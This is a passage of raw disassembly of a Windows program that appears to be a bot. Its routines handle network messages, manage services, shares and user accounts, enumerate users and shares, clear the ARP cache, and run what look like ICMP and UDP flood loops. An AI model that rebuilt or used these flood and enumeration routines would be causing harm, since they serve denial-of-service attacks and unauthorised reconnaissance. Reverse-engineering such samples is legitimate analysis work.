loc_40652D: ; CODE XREF: sub_40649E+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406537: ; CODE XREF: sub_40649E+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40653E: ; CODE XREF: sub_40649E+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406545: ; CODE XREF: sub_40649E+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40654C: ; CODE XREF: sub_40649E+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_406585
jz short loc_40657E
sub eax, 8ADh
jz short loc_4065B0
dec eax
dec eax
jz short loc_406577
dec eax
jz short loc_406570
dec eax
dec eax
jnz short loc_40659B
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406570: ; CODE XREF: sub_40649E+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406577: ; CODE XREF: sub_40649E+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40657E: ; CODE XREF: sub_40649E+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406585: ; CODE XREF: sub_40649E+B5�j
sub eax, 8CAh
jz short loc_4065B7
sub eax, 17h
jz short loc_4065B0
sub eax, 25h
jz short loc_4065A9
sub eax, 29h
jz short loc_4065A2
loc_40659B: ; CODE XREF: sub_40649E+31�j
; sub_40649E+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A2: ; CODE XREF: sub_40649E+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A9: ; CODE XREF: sub_40649E+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B0: ; CODE XREF: sub_40649E+BE�j
; sub_40649E+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B7: ; CODE XREF: sub_40649E+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_4065BC: ; CODE XREF: sub_40649E+3C�j
; sub_40649E+46�j ...
push offset dword_4338C8
call sub_412BB5
pop ecx
pop ecx
mov eax, offset dword_4338C8
retn
sub_40649E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4065CE proc near ; CODE XREF: sub_4078FA+1DEF�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_4140FA
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_41F0B0 ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_4140FA
lea eax, [ebp+var_71C]
push eax
call sub_413FEE
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_4334B4
test eax, eax
jnz short loc_40665E
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_433928
push esi
call sub_412BB5
pop ecx
pop ecx
jmp short loc_406685
; ---------------------------------------------------------------------------
loc_40665E: ; CODE XREF: sub_4065CE+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_40649E
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_433928
push esi
call sub_412BB5
add esp, 14h
loc_406685: ; CODE XREF: sub_4065CE+8E�j
mov eax, esi
pop esi
leave
retn
sub_4065CE endp
; =============== S U B R O U T I N E =======================================
sub_40668A proc near ; CODE XREF: sub_4078FA:loc_4094EC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4066E0
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42A400[esi]
push edi
push eax
call sub_405BA9
add esp, 14h
test eax, eax
jnz short loc_4066D2
push edi
push off_42A3FC[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4066C2: ; CODE XREF: sub_40668A+54�j
mov esi, offset dword_433B28
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4066FD
; ---------------------------------------------------------------------------
loc_4066D2: ; CODE XREF: sub_40668A+2A�j
call sub_405C4B
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4066C2
; ---------------------------------------------------------------------------
loc_4066E0: ; CODE XREF: sub_40668A+C�j
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433B28
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4066FD: ; CODE XREF: sub_40668A+46�j
pop edi
mov eax, esi
pop esi
retn
sub_40668A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406702 proc near ; CODE XREF: sub_4078FA:loc_4095D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40679A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40672B
dec eax
jnz short loc_40677A
push edi
push 0
call sub_406032
pop ecx
pop ecx
jmp short loc_406776
; ---------------------------------------------------------------------------
loc_40672B: ; CODE XREF: sub_406702+18�j
cmp [ebp+arg_8], 0
jnz short loc_406768
push 24h
push edi
call sub_413F30
test eax, eax
pop ecx
pop ecx
jnz short loc_406768
push 57h
pop eax
loc_406742: ; CODE XREF: sub_406702+76�j
call sub_40649E
push eax
push edi
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
loc_406768: ; CODE XREF: sub_406702+2D�j
; sub_406702+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_405FC7
add esp, 0Ch
loc_406776: ; CODE XREF: sub_406702+27�j
test eax, eax
jnz short loc_406742
loc_40677A: ; CODE XREF: sub_406702+1B�j
push edi
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433D28
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
loc_40679A: ; CODE XREF: sub_406702+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4067BA: ; CODE XREF: sub_406702+64�j
; sub_406702+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_406702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067C0 proc near ; CODE XREF: sub_4078FA+1D03�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_405F05
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
loc_4067F9: ; CODE XREF: sub_4067C0+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_4335A0
mov ebx, eax
cmp ebx, esi
jz short loc_40685A
cmp ebx, 0EAh
jz short loc_40685A
push ebx
call sub_40649E
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_4068C7
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_4067C0+5D�j
; sub_4067C0+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4068BE
mov esi, [ebp+var_8]
add esi, 14h
loc_406868: ; CODE XREF: sub_4067C0+FA�j
push dword ptr [esi+10h]
call dword_433598 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40687F
mov eax, offset aNo ; "No"
loc_40687F: ; CODE XREF: sub_4067C0+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_406868
xor esi, esi
loc_4068BE: ; CODE XREF: sub_4067C0+A0�j
push [ebp+var_8]
call dword_4334D8
loc_4068C7: ; CODE XREF: sub_4067C0+98�j
cmp ebx, 0EAh
jz loc_4067F9
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4067C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068DF proc near ; CODE XREF: sub_4078FA:loc_409672�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_406982
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_406921
dec eax
jz short loc_406916
dec eax
jnz short loc_40693C
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4060D0
add esp, 14h
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406916: ; CODE XREF: sub_4068DF+1D�j
push ebx
push edi
call sub_4060AF
pop ecx
pop ecx
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406921: ; CODE XREF: sub_4068DF+1A�j
cmp [ebp+arg_8], edi
jz short loc_406935
push [ebp+arg_8]
push ebx
push edi
call sub_406055
add esp, 0Ch
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406935: ; CODE XREF: sub_4068DF+45�j
push 57h
pop eax
loc_406938: ; CODE XREF: sub_4068DF+35�j
; sub_4068DF+40�j ...
cmp eax, edi
jnz short loc_40695C
loc_40693C: ; CODE XREF: sub_4068DF+20�j
push ebx
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433F28
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_40695C: ; CODE XREF: sub_4068DF+5B�j
call sub_40649E
push eax
push ebx
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_406982: ; CODE XREF: sub_4068DF+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4069A2: ; CODE XREF: sub_4068DF+7B�j
; sub_4068DF+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4068DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069A9 proc near ; CODE XREF: sub_4078FA+1DA5�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_405F05
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
push ebx
loc_4069E8: ; CODE XREF: sub_4069A9+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_433480
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_406A47
cmp eax, 0EAh
jz short loc_406A47
push eax
call sub_40649E
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A47: ; CODE XREF: sub_4069A9+62�j
; sub_4069A9+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_406AB8
loc_406A55: ; CODE XREF: sub_4069A9+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_406A94
push dword ptr [edi]
push offset aS_2 ; " %S"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_406A55
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A94: ; CODE XREF: sub_4069A9+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 1Ch
loc_406AB8: ; CODE XREF: sub_4069A9+9C�j
; sub_4069A9+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
push edi
call dword_4334D8
xor edi, edi
mov [ebp+var_4], edi
loc_406ACB: ; CODE XREF: sub_4069A9+A3�j
; sub_4069A9+114�j
cmp [ebp+var_10], 0EAh
jz loc_4069E8
cmp edi, esi
pop ebx
jz short loc_406AE4
push edi
call dword_4334D8
loc_406AE4: ; CODE XREF: sub_4069A9+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_4069A9 endp
; =============== S U B R O U T I N E =======================================
sub_406B1D proc near ; CODE XREF: sub_4028A8+7D�p
; sub_4038B7+4A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_433514 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_406B45
push [esp+arg_0]
call dword_433500 ; gethostbyname
test eax, eax
jnz short loc_406B3E
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_406B3E: ; CODE XREF: sub_406B1D+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_406B45: ; CODE XREF: sub_406B1D+D�j
retn
sub_406B1D endp
; =============== S U B R O U T I N E =======================================
sub_406B46 proc near ; CODE XREF: sub_40779B+138�p
mov ecx, dword_433584
xor eax, eax
test ecx, ecx
jz short locret_406B54
jmp ecx
; ---------------------------------------------------------------------------
locret_406B54: ; CODE XREF: sub_406B46+A�j
retn
sub_406B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_406B55 proc near ; CODE XREF: sub_4078FA:loc_40BA88�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_4334AC ; GetIpNetTable
mov ecx, eax
sub ecx, ebx
jz short loc_406BE5
sub ecx, 32h
jz loc_406C2C
sub ecx, 48h
jz short loc_406BB0
sub ecx, 6Eh
jz short loc_406BA9
loc_406B95: ; CODE XREF: sub_406B55+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_406C0D
; ---------------------------------------------------------------------------
loc_406BA9: ; CODE XREF: sub_406B55+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_406C02
; ---------------------------------------------------------------------------
loc_406BB0: ; CODE XREF: sub_406B55+39�j
push [ebp+78h+var_8]
call sub_41344D
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_406BFD
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_4334AC ; GetIpNetTable
cmp eax, ebx
jnz short loc_406B95
loc_406BE5: ; CODE XREF: sub_406B55+2B�j
cmp [esi], ebx
jbe short loc_406C1A
lea edi, [esi+4]
loc_406BEC: ; CODE XREF: sub_406B55+A4�j
push edi
call dword_43350C ; DeleteIpNetEntry
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_406BEC
jmp short loc_406C1A
; ---------------------------------------------------------------------------
loc_406BFD: ; CODE XREF: sub_406B55+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_406C02: ; CODE XREF: sub_406B55+59�j
; sub_406B55+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_406C0D: ; CODE XREF: sub_406B55+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401C33
pop ecx
loc_406C1A: ; CODE XREF: sub_406B55+92�j
; sub_406B55+A6�j
push esi
call sub_412FE4
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_406B55+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_406C02
sub_406B55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C33 proc near ; CODE XREF: sub_401141+21B�p
; sub_401141+32A�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_433418 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_434128
push esi
call sub_412BB5
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_406C33 endp
; =============== S U B R O U T I N E =======================================
sub_406C89 proc near ; CODE XREF: sub_41046C+437�p
; sub_41046C+48D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_406CB4
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_406CA7: ; CODE XREF: sub_406C89+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_406CA7
pop edi
jmp short loc_406CB8
; ---------------------------------------------------------------------------
loc_406CB4: ; CODE XREF: sub_406C89+A�j
mov esi, [esp+4+arg_0]
loc_406CB8: ; CODE XREF: sub_406C89+29�j
test ecx, ecx
jz short loc_406CC1
movzx eax, byte ptr [esi]
add edx, eax
loc_406CC1: ; CODE XREF: sub_406C89+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_406C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CD9 proc near ; DATA XREF: sub_4078FA+50A8�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_4334F0 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_433514 ; inet_addr
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_406D32
lea eax, [ebp+var_C0]
push eax
call dword_433500 ; gethostbyname
test eax, eax
jz short loc_406D38
loc_406D32: ; CODE XREF: sub_406CD9+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_406D96
loc_406D38: ; CODE XREF: sub_406CD9+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_406D7A
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406D7A: ; CODE XREF: sub_406CD9+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push ebx
jmp loc_406E5B
; ---------------------------------------------------------------------------
loc_406D96: ; CODE XREF: sub_406CD9+5D�j
test eax, eax
jz short loc_406DA6
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_406DA9
; ---------------------------------------------------------------------------
loc_406DA6: ; CODE XREF: sub_406CD9+BF�j
mov [ebp+var_4], esi
loc_406DA9: ; CODE XREF: sub_406CD9+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_406DC4
mov [ebp+var_3C], eax
loc_406DC4: ; CODE XREF: sub_406CD9+E6�j
cmp [ebp+var_38], ebx
jge short loc_406DCC
mov [ebp+var_38], ebx
loc_406DCC: ; CODE XREF: sub_406CD9+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_406DFB
loc_406DD5: ; CODE XREF: sub_406CD9+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_433588 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_406DD5
loc_406DFB: ; CODE XREF: sub_406CD9+FA�j
push [ebp+arg_0]
call dword_433524 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_406E44
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406E44: ; CODE XREF: sub_406CD9+149�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_406E5B: ; CODE XREF: sub_406CD9+B8�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_406CD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E62 proc near ; DATA XREF: sub_4078FA+5201�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_412DD0
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
push 11h
push 2
push 2
call dword_4334A0 ; socket
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_433514 ; inet_addr
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
call dword_433500 ; gethostbyname
mov ecx, eax
cmp ecx, edi
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_406F21
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_406F21: ; CODE XREF: sub_406E62+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push esi
jmp loc_407076
; ---------------------------------------------------------------------------
loc_406F3D: ; CODE XREF: sub_406E62+6A�j
; sub_406E62+7D�j
cmp [ebp+var_28], edi
jge short loc_406F45
mov [ebp+var_28], edi
loc_406F45: ; CODE XREF: sub_406E62+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_406F52
mov [ebp+var_28], eax
loc_406F52: ; CODE XREF: sub_406E62+EB�j
cmp ecx, edi
jz short loc_406F5D
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_406F60
; ---------------------------------------------------------------------------
loc_406F5D: ; CODE XREF: sub_406E62+F2�j
lea eax, [ebp+arg_0]
loc_406F60: ; CODE XREF: sub_406E62+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_406F7B
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_406F7E
; ---------------------------------------------------------------------------
loc_406F7B: ; CODE XREF: sub_406E62+106�j
